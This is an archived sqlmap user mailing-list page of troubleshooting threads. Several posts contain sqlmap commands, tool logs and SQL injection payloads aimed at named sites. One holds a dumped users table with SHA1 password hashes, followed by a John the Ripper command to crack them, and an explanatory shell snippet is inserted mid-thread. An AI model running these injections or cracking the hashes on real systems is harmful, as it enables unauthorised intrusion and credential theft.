sqlmap-users Mailing List for sqlmap (Page 46)
Brought to you by:
inquisb
From: Hans W. <wur...@go...> - 2012-12-15 16:26:43
Probably has something to do with this:

16:38:17] [WARNING] HTTP error codes detected during testing: 400 (Bad Request) - 1 times, 500 (Internal Server Error) - 9 times

Did you try the tamper scripts?

On 15.12.2012 at 17:10, Volker Nebelung <vol...@rw...> wrote:

Hi,

I am using sqlmap to scan a specific GET parameter of a target site. I know there is a SQL injection in parameter 2:

python sqlmap.py -u "http://example.net/de/de*/site" --batch

sqlmap gives me the following result:

…
[16:36:19] [INFO] heuristic test shows that URI parameter '#1*' might be injectable (possible DBMS: Microsoft Access)
[16:36:19] [INFO] testing for SQL injection on URI parameter '#1*'
[16:36:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:36:29] [INFO] URI parameter '#1*' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[16:36:29] [INFO] parsed error message(s) showed that the back-end DBMS could be Microsoft Access. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[16:36:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[16:36:29] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[16:37:05] [INFO] checking if the injection point on URI parameter '#1*' is a false positive
[16:37:11] [INFO] URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 34 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://example.net:80/de/de' AND 9199=9199 AND 'tyFW'='tyFW/site
---
[16:37:11] [INFO] testing Microsoft Access
[16:37:13] [INFO] confirming Microsoft Access
[16:37:14] [WARNING] the back-end DBMS is not Microsoft Access
[16:37:14] [INFO] testing MySQL
[16:37:16] [WARNING] the back-end DBMS is not MySQL
[16:37:16] [INFO] testing Oracle
[16:37:17] [WARNING] the back-end DBMS is not Oracle
[16:37:17] [INFO] testing PostgreSQL
[16:37:18] [WARNING] the back-end DBMS is not PostgreSQL
[16:37:18] [INFO] testing Microsoft SQL Server
[16:37:19] [WARNING] the back-end DBMS is not Microsoft SQL Server
[16:37:19] [INFO] testing SQLite
[16:37:20] [WARNING] the back-end DBMS is not SQLite
[16:37:20] [INFO] testing Firebird
[16:37:21] [WARNING] the back-end DBMS is not Firebird
[16:37:21] [INFO] testing SAP MaxDB
[16:37:22] [WARNING] the back-end DBMS is not SAP MaxDB
[16:37:22] [INFO] testing Sybase
[16:37:23] [WARNING] the back-end DBMS is not Sybase
[16:37:23] [INFO] testing IBM DB2
[16:37:24] [WARNING] the back-end DBMS is not IBM DB2
[16:37:24] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system, but from the HTML error page it was possible to determinate that the back-end DBMS is Microsoft Access. Do not specify the back-end DBMS manually, sqlmap will fingerprint the DBMS for you
[16:37:24] [WARNING] HTTP error codes detected during testing: 400 (Bad Request) - 24 times, 500 (Internal Server Error) - 20 times

[*] shutting down at 16:37:24

I am confused at this point: Is sqlmap thinking that the DBMS is MS Access or not?

When I manually try following URL in my browser "http://example.net/de/de'/site" I get a 500 HTML-page with output "Microsoft JET Database Engine Error …" so I would say the DBMS is MS Access.

When I now try to get for example all tables, then following happens:

python sqlmap.py -u "example.net/de/de*/site" --batch --tables

sqlmap/1.0-dev-0664e72 - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:38:02

[16:38:05] [INFO] custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[16:38:05] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://example.net:80/de/de' AND 9199=9199 AND 'tyFW'='tyFW/site
---
[16:38:07] [INFO] testing MySQL
[16:38:08] [INFO] heuristics detected web page charset 'ascii'
[16:38:08] [WARNING] the back-end DBMS is not MySQL
[16:38:08] [INFO] testing Oracle
[16:38:09] [INFO] heuristics detected web page charset 'ISO-8859-2'
[16:38:09] [WARNING] the back-end DBMS is not Oracle
[16:38:09] [INFO] testing PostgreSQL
[16:38:10] [WARNING] reflective value(s) found and filtering out
[16:38:10] [WARNING] the back-end DBMS is not PostgreSQL
[16:38:10] [INFO] testing Microsoft SQL Server
[16:38:11] [WARNING] the back-end DBMS is not Microsoft SQL Server
[16:38:11] [INFO] testing SQLite
[16:38:12] [WARNING] the back-end DBMS is not SQLite
[16:38:12] [INFO] testing Microsoft Access
[16:38:12] [INFO] confirming Microsoft Access
[16:38:13] [WARNING] the back-end DBMS is not Microsoft Access
[16:38:13] [INFO] testing Firebird
[16:38:14] [WARNING] the back-end DBMS is not Firebird
[16:38:14] [INFO] testing SAP MaxDB
[16:38:15] [WARNING] the back-end DBMS is not SAP MaxDB
[16:38:15] [INFO] testing Sybase
[16:38:16] [WARNING] the back-end DBMS is not Sybase
[16:38:16] [INFO] testing IBM DB2
[16:38:17] [WARNING] the back-end DBMS is not IBM DB2
[16:38:17] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system. Support for this DBMS will be implemented at some point
[16:38:17] [WARNING] HTTP error codes detected during testing: 400 (Bad Request) - 1 times, 500 (Internal Server Error) - 9 times

[*] shutting down at 16:38:17

Even when I try to use --text-only or --not-string switches I am not able to receive the tables.

Any ideas?

Best regards
Volker Nebelung

------------------------------------------------------------------------------
LogMeIn Rescue: Anywhere, Anytime Remote support for IT. Free Trial
Remotely access PCs and mobile devices and provide instant support
Improve your efficiency, and focus on delivering more value-add services
Discover what IT Professionals Know. Rescue delivers
http://p.sf.net/sfu/logmein_12329d2d
_______________________________________________
sqlmap-users mailing list
sql...@li...
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

From: Volker N. <vol...@rw...> - 2012-12-15 16:09:52
Hi,

I am using sqlmap to scan a specific GET parameter of a target site. I know there is a SQL injection in parameter 2:

python sqlmap.py -u "http://example.net/de/de*/site" --batch

sqlmap gives me the following result:

> …
> [16:36:19] [INFO] heuristic test shows that URI parameter '#1*' might be injectable (possible DBMS: Microsoft Access)
> [16:36:19] [INFO] testing for SQL injection on URI parameter '#1*'
> [16:36:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
> [16:36:29] [INFO] URI parameter '#1*' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
> [16:36:29] [INFO] parsed error message(s) showed that the back-end DBMS could be Microsoft Access. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
> [16:36:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
> [16:36:29] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
> [16:37:05] [INFO] checking if the injection point on URI parameter '#1*' is a false positive
> [16:37:11] [INFO] URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
> sqlmap identified the following injection points with a total of 34 HTTP(s) requests:
> ---
> Place: URI
> Parameter: #1*
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: http://example.net:80/de/de' AND 9199=9199 AND 'tyFW'='tyFW/site
> ---
> [16:37:11] [INFO] testing Microsoft Access
> [16:37:13] [INFO] confirming Microsoft Access
> [16:37:14] [WARNING] the back-end DBMS is not Microsoft Access
> [16:37:14] [INFO] testing MySQL
> [16:37:16] [WARNING] the back-end DBMS is not MySQL
> [16:37:16] [INFO] testing Oracle
> [16:37:17] [WARNING] the back-end DBMS is not Oracle
> [16:37:17] [INFO] testing PostgreSQL
> [16:37:18] [WARNING] the back-end DBMS is not PostgreSQL
> [16:37:18] [INFO] testing Microsoft SQL Server
> [16:37:19] [WARNING] the back-end DBMS is not Microsoft SQL Server
> [16:37:19] [INFO] testing SQLite
> [16:37:20] [WARNING] the back-end DBMS is not SQLite
> [16:37:20] [INFO] testing Firebird
> [16:37:21] [WARNING] the back-end DBMS is not Firebird
> [16:37:21] [INFO] testing SAP MaxDB
> [16:37:22] [WARNING] the back-end DBMS is not SAP MaxDB
> [16:37:22] [INFO] testing Sybase
> [16:37:23] [WARNING] the back-end DBMS is not Sybase
> [16:37:23] [INFO] testing IBM DB2
> [16:37:24] [WARNING] the back-end DBMS is not IBM DB2
> [16:37:24] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system, but from the HTML error page it was possible to determinate that the back-end DBMS is Microsoft Access. Do not specify the back-end DBMS manually, sqlmap will fingerprint the DBMS for you
> [16:37:24] [WARNING] HTTP error codes detected during testing:
> 400 (Bad Request) - 24 times, 500 (Internal Server Error) - 20 times
>
> [*] shutting down at 16:37:24

I am confused at this point: Is sqlmap thinking that the DBMS is MS Access or not?

When I manually try following URL in my browser "http://example.net/de/de'/site" I get a 500 HTML-page with output "Microsoft JET Database Engine Error …" so I would say the DBMS is MS Access.

When I now try to get for example all tables, then following happens:

> python sqlmap.py -u "example.net/de/de*/site" --batch --tables
>
> sqlmap/1.0-dev-0664e72 - automatic SQL injection and database takeover tool
> http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 16:38:02
>
> [16:38:05] [INFO] custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
> [16:38:05] [INFO] testing connection to the target url
> sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
> ---
> Place: URI
> Parameter: #1*
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: http://example.net:80/de/de' AND 9199=9199 AND 'tyFW'='tyFW/site
> ---
> [16:38:07] [INFO] testing MySQL
> [16:38:08] [INFO] heuristics detected web page charset 'ascii'
> [16:38:08] [WARNING] the back-end DBMS is not MySQL
> [16:38:08] [INFO] testing Oracle
> [16:38:09] [INFO] heuristics detected web page charset 'ISO-8859-2'
> [16:38:09] [WARNING] the back-end DBMS is not Oracle
> [16:38:09] [INFO] testing PostgreSQL
> [16:38:10] [WARNING] reflective value(s) found and filtering out
> [16:38:10] [WARNING] the back-end DBMS is not PostgreSQL
> [16:38:10] [INFO] testing Microsoft SQL Server
> [16:38:11] [WARNING] the back-end DBMS is not Microsoft SQL Server
> [16:38:11] [INFO] testing SQLite
> [16:38:12] [WARNING] the back-end DBMS is not SQLite
> [16:38:12] [INFO] testing Microsoft Access
> [16:38:12] [INFO] confirming Microsoft Access
> [16:38:13] [WARNING] the back-end DBMS is not Microsoft Access
> [16:38:13] [INFO] testing Firebird
> [16:38:14] [WARNING] the back-end DBMS is not Firebird
> [16:38:14] [INFO] testing SAP MaxDB
> [16:38:15] [WARNING] the back-end DBMS is not SAP MaxDB
> [16:38:15] [INFO] testing Sybase
> [16:38:16] [WARNING] the back-end DBMS is not Sybase
> [16:38:16] [INFO] testing IBM DB2
> [16:38:17] [WARNING] the back-end DBMS is not IBM DB2
> [16:38:17] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system. Support for this DBMS will be implemented at some point
> [16:38:17] [WARNING] HTTP error codes detected during testing:
> 400 (Bad Request) - 1 times, 500 (Internal Server Error) - 9 times
>
> [*] shutting down at 16:38:17

Even when I try to use --text-only or --not-string switches I am not able to receive the tables.

Any ideas?

Best regards
Volker Nebelung

From: Dennis <kor...@ya...> - 2012-12-14 13:46:51
You rock (as always) ;)

Thanks

On 14.12.2012 14:35, Miroslav Stampar wrote:
> Fixed.
>
> Bye
>
> On Fri, Dec 14, 2012 at 2:22 PM, Dennis <kor...@ya...> wrote:
>
>     Hi guys,
>
>     since I updated sqlmap today, I get the following python error (using
>     Python 2.6.7):
>     $ ./sqlmap.py --help
>     Traceback (most recent call last):
>       File "./sqlmap.py", line 15, in <module>
>         from _sqlmap import main
>       File "/home/dst/bin/sqlmap/_sqlmap.py", line 48, in <module>
>         from lib.utils.restapi import restAPIrun
>       File "/home/dst/bin/sqlmap/lib/utils/restapi.py", line 8, in <module>
>         import argparse
>     ImportError: No module named argparse
>
>     Quick google tells me that 'argparse' has been added to python in
>     version 3.2. Is the assumption then correct that sqlmap needs python
>     >3.2 from now on?
>
>     Cheers
>     Dennis
>
> --
> Miroslav Stampar
> http://about.me/stamparm

From: Miroslav S. <mir...@gm...> - 2012-12-14 13:35:12
Fixed.

Bye

On Fri, Dec 14, 2012 at 2:22 PM, Dennis <kor...@ya...> wrote:
> Hi guys,
>
> since I updated sqlmap today, I get the following python error (using
> Python 2.6.7):
> $ ./sqlmap.py --help
> Traceback (most recent call last):
>   File "./sqlmap.py", line 15, in <module>
>     from _sqlmap import main
>   File "/home/dst/bin/sqlmap/_sqlmap.py", line 48, in <module>
>     from lib.utils.restapi import restAPIrun
>   File "/home/dst/bin/sqlmap/lib/utils/restapi.py", line 8, in <module>
>     import argparse
> ImportError: No module named argparse
>
> Quick google tells me that 'argparse' has been added to python in
> version 3.2. Is the assumption then correct that sqlmap needs python
> >3.2 from now on?
>
> Cheers
> Dennis

--
Miroslav Stampar
http://about.me/stamparm

From: Dennis <kor...@ya...> - 2012-12-14 13:22:28
Hi guys,

since I updated sqlmap today, I get the following python error (using Python 2.6.7):

$ ./sqlmap.py --help
Traceback (most recent call last):
  File "./sqlmap.py", line 15, in <module>
    from _sqlmap import main
  File "/home/dst/bin/sqlmap/_sqlmap.py", line 48, in <module>
    from lib.utils.restapi import restAPIrun
  File "/home/dst/bin/sqlmap/lib/utils/restapi.py", line 8, in <module>
    import argparse
ImportError: No module named argparse

Quick google tells me that 'argparse' has been added to python in version 3.2. Is the assumption then correct that sqlmap needs python >3.2 from now on?

Cheers
Dennis

From: Bernardo D. A. G. <ber...@gm...> - 2012-12-13 20:06:06
Hi,

Sooner or later all projects go web and with the over hyped web 2.0 era and the high availability of eye-candy web development frameworks we have plans to follow the infosec tools herd starting by developing a RESTful API to interact with the sqlmap engine independently from the command line.

As of a couple of days ago we do have an XML-RPC service[1] thanks to Miroslav, although we have decided internally after much bitching to replace it with a REST-JSON API[7] to let anyone script and interact with the sqlmap engine via HTTP. The idea is to put the API behind some kind of authentication and allow concurrent sessions by different "users" whereby sqlmap API can be run (e.g. python sqlmap --daemon or similar) on a predefined interface and TCP port and clients can query the API on such TCP port to mount attacks against a single target or multiple targets[5]. Needless to say that we are at an early design phase hence this email.

It is that time of the year again when the most prepare for holidays and celebrating Christmas with family (enjoy!) and the few Internauts addicted contribute towards the sqlmap project with ideas and code[2] so if you feel like:

* You have experience with web development in Python or..
* ..you have motivation and time enough to learn how to develop a RESTful API in Python and..
* ..you are familiar or keen on learning Python web frameworks like Flask[3] and Bottle[4] and..
* ..you have the guts to commit your time to discuss the design of this (or others) feature and contribute code[2] to one of the most acclaimed[6] and discussed (blamed sometimes) IT security tools out there..

..then do not hesitate to reply to this email either privately to us only (de...@sq...) or publicly hitting the "Reply" button in your favorite mail client.

We look forward to reading from you. Yes, I am looking at you Python software developer with web skills!

[1] https://github.com/sqlmapproject/sqlmap/issues/287
[2] https://github.com/sqlmapproject/sqlmap/blob/master/CONTRIBUTING.md#submitting-code-changes
[3] http://flask.pocoo.org
[4] http://bottlepy.org
[5] how cool is this
[6] http://sectools.org/tool/sqlmap/
[7] https://github.com/sqlmapproject/sqlmap/issues/297

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)

From: Miroslav S. <mir...@gm...> - 2012-12-13 09:03:15
Hi.

You've put sqlmap into background process and you expect it to accept console output at your will :). I believe that's not something we could help you along.

"do you want to skip those kind of cases (and save scanning time)? [y/N] y
bash: y: command not found"

Kind regards,
Miroslav Stampar

On Wed, Dec 12, 2012 at 9:54 PM, <dr...@sa...> wrote:
> Hi everyone, I googled but nothing came up that was related to this. On
> OWASP scanner I had a SQL injection alert and I tried to test it with
> sqlmap but I got an error and nothing happens, the program just escapes
> with this:
>
> ...
>
> python sqlmap.py -u
> http://www.target.tk/inscritos.php?tipoInscricao=3&tipoDir=119%20AND%201=2
> [1] 2816
> [lol@whitehat sqlmap]$
> sqlmap/1.0-dev - automatic SQL injection and database takeover tool
> http://sqlmap.org
>
> [*] starting at 20:38:36
>
> [20:38:37] [INFO] testing connection to the target url
> [20:38:37] [INFO] testing if the url is stable, wait a few seconds
> [20:38:38] [INFO] url is stable
> [20:38:38] [INFO] testing if GET parameter 'tipoInscricao' is dynamic
> [20:38:39] [INFO] confirming that GET parameter 'tipoInscricao' is dynamic
> [20:38:40] [INFO] GET parameter 'tipoInscricao' is dynamic
> [20:38:40] [WARNING] reflective value(s) found and filtering out
> [20:38:40] [WARNING] frames detected containing attacked parameter
> values. Please be sure to test those separately in case that attack on
> this page fails
> [20:38:41] [ERROR] possible integer casting detected (e.g.
> tipoInscricao=(int)$_REQUEST('tipoInscricao')) at the back-end web
> application
> do you want to skip those kind of cases (and save scanning time)? [y/N] y
> bash: y: command not found
>
> [1]+ Stopped python sqlmap.py -u
> http://www.target.tk/inscritos.php?tipoInscricao=3
> [lol@whitehat sqlmap]$

--
Miroslav Stampar
http://about.me/stamparm

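The shell behaviour behind the reply above, as an added example that is not part of the thread: an unquoted "&" ends the command and backgrounds it, and the rest of the URL is parsed as a shell variable assignment. `show_url` is a hypothetical stand-in for any command-line tool, and the host is replaced with the reserved name www.example.test.

```shell
#!/bin/sh
# show_url is a constructed stand-in for a command-line tool: it only echoes
# the one argument it received. Nothing is sent over the network.
show_url() { printf '%s\n' "$1"; }

# The command line from the post, re-parsed by eval as it was typed: unquoted.
# (Host replaced with the reserved name www.example.test, an assumption.)
parse_unquoted() {
    unset tipoDir
    out=$(mktemp)
    eval 'show_url http://www.example.test/inscritos.php?tipoInscricao=3&tipoDir=119%20AND%201=2' >"$out"
    wait    # everything before "&" was started as a background job
    seen=$(cat "$out")
    rm -f "$out"
    # Everything after "&" was parsed as the shell assignment tipoDir=...
    printf 'url=%s shellvar=%s\n' "$seen" "${tipoDir-unset}"
}

# Same stand-in, URL in double quotes as in the corrected command in the thread.
parse_quoted() {
    unset tipoDir
    seen=$(eval 'show_url "http://www.example.test/inscritos.php?tipoInscricao=3&tipoDir=119"')
    printf 'url=%s shellvar=%s\n' "$seen" "${tipoDir-unset}"
}

parse_unquoted
parse_quoted
```

In an interactive shell the background job is stopped as soon as it tries to read the terminal, so the "y" typed at the prompt goes to bash instead, which matches the "[1]+ Stopped" and "bash: y: command not found" lines in the post.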
From: Luka P. <lu...@pu...> - 2012-12-13 08:16:43
Remove those SQL commands from your parameters!

Try:

sqlmap -u "http://www.target.tk/inscritos.php?tipoInscricao=3&tipoDir=119" -p tipoDir

On Thu, Dec 13, 2012 at 12:38 AM, Julius Kivimäki <jul...@gm...> wrote:
> Maybe you should take a quick look at what you are doing here and then try
> again without repeating your stupid error.
>
> 2012/12/12 <dr...@sa...>
>
>> do you want to skip those kind of cases (and save scanning time)? [y/N] y

From: Julius K. <jul...@gm...> - 2012-12-12 23:38:15
Maybe you should take a quick look at what you are doing here and then try again without repeating your stupid error.

2012/12/12 <dr...@sa...>
> do you want to skip those kind of cases (and save scanning time)? [y/N] y

From: <dr...@sa...> - 2012-12-12 20:54:59
Hi everyone, I googled but nothing came up that was related to this. On OWASP scanner I had a SQL injection alert and I tried to test it with sqlmap but I got an error and nothing happens, the program just escapes with this:

...

python sqlmap.py -u http://www.target.tk/inscritos.php?tipoInscricao=3&tipoDir=119%20AND%201=2
[1] 2816
[lol@whitehat sqlmap]$
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[*] starting at 20:38:36

[20:38:37] [INFO] testing connection to the target url
[20:38:37] [INFO] testing if the url is stable, wait a few seconds
[20:38:38] [INFO] url is stable
[20:38:38] [INFO] testing if GET parameter 'tipoInscricao' is dynamic
[20:38:39] [INFO] confirming that GET parameter 'tipoInscricao' is dynamic
[20:38:40] [INFO] GET parameter 'tipoInscricao' is dynamic
[20:38:40] [WARNING] reflective value(s) found and filtering out
[20:38:40] [WARNING] frames detected containing attacked parameter values. Please be sure to test those separately in case that attack on this page fails
[20:38:41] [ERROR] possible integer casting detected (e.g. tipoInscricao=(int)$_REQUEST('tipoInscricao')) at the back-end web application
do you want to skip those kind of cases (and save scanning time)? [y/N] y
bash: y: command not found

[1]+ Stopped python sqlmap.py -u http://www.target.tk/inscritos.php?tipoInscricao=3
[lol@whitehat sqlmap]$

From: <dr...@sa...> - 2012-12-12 10:31:55
Well I installed the jumbo version and used ur command and it worked tnx.

Quoting Miroslav Stampar <mir...@gm...>:

> Hi.
>
> Please try with:
>
> john --format=raw-sha1 pwd
>
> Kind regards,
> Miroslav Stampar
>
> On Tue, Dec 11, 2012 at 11:49 PM, <dr...@sa...> wrote:
>>
>> how do I crack these dumps?
>>
>> Place: GET
>> Parameter: id
>> Type: boolean-based blind
>> Title: AND boolean-based blind - WHERE or HAVING clause
>> Payload: id=37 AND 5567=5567
>>
>> Type: UNION query
>> Title: MySQL UNION query (NULL) - 6 columns
>> Payload: id=-1879 UNION ALL SELECT
>> NULL,NULL,CONCAT(0x3a7876633a,0x4f737648636161497a5a,0x3a6f63633a),NULL,NULL,NULL#
>>
>> Type: AND/OR time-based blind
>> Title: MySQL > 5.0.11 AND time-based blind
>> Payload: id=37 AND SLEEP(5)
>> ---
>>
>> Table: users
>> [2 entries]
>> +----+-----------+--------+------------------------------------------+
>> | id | nome      | status | password                                 |
>> +----+-----------+--------+------------------------------------------+
>> | 15 | alexandra | 1      | 9e19a4e7642ae910145d3015e36824d03aa64026 |
>> | 16 | admin     | 1      | 9e19a4e7642ae910145d3015e36824d03aa64026 |
>> +----+-----------+--------+------------------------------------------+
>>
>> [d@whitechat run]$ cat pwd
>> 9e19a4e7642ae910145d3015e36824d03aa64026
>> 9e19a4e7642ae910145d3015e36824d03aa64026
>>
>> [d@whitechat run]$ ./john pwd
>> No password hashes loaded (see FAQ)
>>
>> Best regards, Luis Gomes.
>
> --
> Miroslav Stampar
> http://about.me/stamparm

Best regards, Luis Gomes.

From: Miroslav S. <mir...@gm...> - 2012-12-12 09:45:34
Hi.

Please try with:

john --format=raw-sha1 pwd

Kind regards,
Miroslav Stampar

On Tue, Dec 11, 2012 at 11:49 PM, <dr...@sa...> wrote:
>
> how do I crack these dumps?
>
> Place: GET
> Parameter: id
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: id=37 AND 5567=5567
>
> Type: UNION query
> Title: MySQL UNION query (NULL) - 6 columns
> Payload: id=-1879 UNION ALL SELECT
> NULL,NULL,CONCAT(0x3a7876633a,0x4f737648636161497a5a,0x3a6f63633a),NULL,NULL,NULL#
>
> Type: AND/OR time-based blind
> Title: MySQL > 5.0.11 AND time-based blind
> Payload: id=37 AND SLEEP(5)
> ---
>
> Table: users
> [2 entries]
> +----+-----------+--------+------------------------------------------+
> | id | nome      | status | password                                 |
> +----+-----------+--------+------------------------------------------+
> | 15 | alexandra | 1      | 9e19a4e7642ae910145d3015e36824d03aa64026 |
> | 16 | admin     | 1      | 9e19a4e7642ae910145d3015e36824d03aa64026 |
> +----+-----------+--------+------------------------------------------+
>
> [d@whitechat run]$ cat pwd
> 9e19a4e7642ae910145d3015e36824d03aa64026
> 9e19a4e7642ae910145d3015e36824d03aa64026
>
> [d@whitechat run]$ ./john pwd
> No password hashes loaded (see FAQ)
>
> Best regards, Luis Gomes.

--
Miroslav Stampar
http://about.me/stamparm

From: <dr...@sa...> - 2012-12-11 22:49:27
how do I crack these dumps?

Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=37 AND 5567=5567

Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: id=-1879 UNION ALL SELECT NULL,NULL,CONCAT(0x3a7876633a,0x4f737648636161497a5a,0x3a6f63633a),NULL,NULL,NULL#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=37 AND SLEEP(5)
---

Table: users
[2 entries]
+----+-----------+--------+------------------------------------------+
| id | nome      | status | password                                 |
+----+-----------+--------+------------------------------------------+
| 15 | alexandra | 1      | 9e19a4e7642ae910145d3015e36824d03aa64026 |
| 16 | admin     | 1      | 9e19a4e7642ae910145d3015e36824d03aa64026 |
+----+-----------+--------+------------------------------------------+

[d@whitechat run]$ cat pwd
9e19a4e7642ae910145d3015e36824d03aa64026
9e19a4e7642ae910145d3015e36824d03aa64026

[d@whitechat run]$ ./john pwd
No password hashes loaded (see FAQ)

Best regards, Luis Gomes.

From: Miroslav S. <mir...@gm...> - 2012-12-08 08:29:35
Hi again.

Just retried with --hex and BLOB column inside a testing table (inserted some binaries from /bin) and it works out of box. Have you tried using --hex in --dump mode?

Also, HEX inside --sql-shell won't work for all cases because for example ERROR-based injection needs splitting of values to be retrieved correctly.

Kind regards.

On Sat, Dec 8, 2012 at 9:13 AM, Miroslav Stampar <mir...@gm...> wrote:
> Hi.
>
> Still on our Issues list [1]. Currently there are indeed some data types
> that require more attention than --hex. We'll work on it, can't promise
> you dates.
>
> Kind regards,
> Miroslav Stampar
>
> [1] https://github.com/sqlmapproject/sqlmap/issues/8
>
> On Sat, Dec 8, 2012 at 7:41 AM, Mardian Gunawan <gun...@gm...> wrote:
>
>> Hi all,
>>
>> How do you fetch/get mysql blob data using sqlmap? I've tried using
>> HEX() on sqlmap --sql-shell function, I still don't know how to get the
>> actual data.
>>
>> --
>> Cheers,
>> Gunma
>> http://gunma.rootedker.nl
>
> --
> Miroslav Stampar
> http://about.me/stamparm

--
Miroslav Stampar
http://about.me/stamparm

From: Miroslav S. <mir...@gm...> - 2012-12-08 08:13:26
Hi.

Still on our Issues list [1]. Currently there are indeed some data types that require more attention than --hex. We'll work on it, can't promise you dates.

Kind regards,
Miroslav Stampar

[1] https://github.com/sqlmapproject/sqlmap/issues/8

On Sat, Dec 8, 2012 at 7:41 AM, Mardian Gunawan <gun...@gm...> wrote:
> Hi all,
>
> How do you fetch/get mysql blob data using sqlmap? I've tried using
> HEX() on sqlmap --sql-shell function, I still don't know how to get the
> actual data.
>
> --
> Cheers,
> Gunma
> http://gunma.rootedker.nl

--
Miroslav Stampar
http://about.me/stamparm
From: Mardian G. <gun...@gm...> - 2012-12-08 06:42:07
Hi all,

How do you fetch/get mysql blob data using sqlmap? I've tried using HEX() on sqlmap --sql-shell function, I still don't know how to get the actual data.

--
Cheers,
Gunma
http://gunma.rootedker.nl
From: Miroslav S. <mir...@gm...> - 2012-12-07 11:04:33
p.s. redirect response messages will now always be displayed in high verbose level as "[TRAFFIC IN] HTTP redirect", no matter if following or not:

[12:01:24] [TRAFFIC IN] HTTP redirect [#1] (301 Moved Permanently):
Proxy-connection: close
Set-cookie: jl_stickiness=2685012490.20480.0000; path=/
Age: 0
Server: Varnish
Via: 1.1 varnish, 1.0 157.247.180.183:8080 (squid/2.6.STABLE18)
Location: http://www.target.com
Date: Fri, 07 Dec 2012 11:00:49 GMT
Accept-ranges: bytes

Kind regards,
Miroslav Stampar

On Fri, Dec 7, 2012 at 11:58 AM, Miroslav Stampar <mir...@gm...> wrote:
> Done ;)
>
> Bye
>
> On Fri, Dec 7, 2012 at 11:22 AM, Miroslav Stampar <mir...@gm...> wrote:
>
>> Hi.
>>
>> Sorry for waiting. Opened a new issue for this one [1]. Will try to
>> finish it today.
>>
>> Kind regards,
>> Miroslav Stampar
>>
>> [1] https://github.com/sqlmapproject/sqlmap/issues/288
>>
>> On Mon, Nov 12, 2012 at 4:20 AM, Abuse 007 <abu...@gm...> wrote:
>>
>>> Hi,
>>>
>>> When looking at HTTP Requests and Response, by using verbose level 6 (-v
>>> 6), sqlmap does not show the full HTTP response with the HTTP 302 Moved
>>> Temporarily.
>>>
>>> sqlmap got a 302 redirect to 'http://removed/removed.shtml'. Do you
>>> want to follow? [Y/n] y
>>> [14:07:02] [INFO] heuristics detected web page charset 'ascii'
>>> [14:07:02] [TRAFFIC IN] HTTP response [#2] (302 Object Moved):
>>> Connection: close
>>> Content-type: text/html
>>> Location: https://removed/removed.shtml
>>> Cache-control: private
>>> [14:07:02] [TRAFFIC IN] HTTP response [#2] (302 Moved Temporarily):
>>>
>>> In the body of the first HTTP Response, the 302 temporary redirect, is
>>> the result of the SQL injection.
>>>
>>> If I don't follow the redirection then I see the result. This is fine
>>> (to me at least), I just didn't realise or expect it at first. I expected
>>> that verbose 6 would show all of the responses, particularly those that
>>> contain the results that sqlmap is returning.
>>>
>>> Cheers,
>>> Abu
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>
> --
> Miroslav Stampar
> http://about.me/stamparm

--
Miroslav Stampar
http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2012-12-07 10:58:45
Done ;)

Bye

On Fri, Dec 7, 2012 at 11:22 AM, Miroslav Stampar <mir...@gm...> wrote:
> Hi.
>
> Sorry for waiting. Opened a new issue for this one [1]. Will try to finish
> it today.
>
> Kind regards,
> Miroslav Stampar
>
> [1] https://github.com/sqlmapproject/sqlmap/issues/288
>
> On Mon, Nov 12, 2012 at 4:20 AM, Abuse 007 <abu...@gm...> wrote:
>
>> Hi,
>>
>> When looking at HTTP Requests and Response, by using verbose level 6 (-v
>> 6), sqlmap does not show the full HTTP response with the HTTP 302 Moved
>> Temporarily.
>>
>> sqlmap got a 302 redirect to 'http://removed/removed.shtml'. Do you want
>> to follow? [Y/n] y
>> [14:07:02] [INFO] heuristics detected web page charset 'ascii'
>> [14:07:02] [TRAFFIC IN] HTTP response [#2] (302 Object Moved):
>> Connection: close
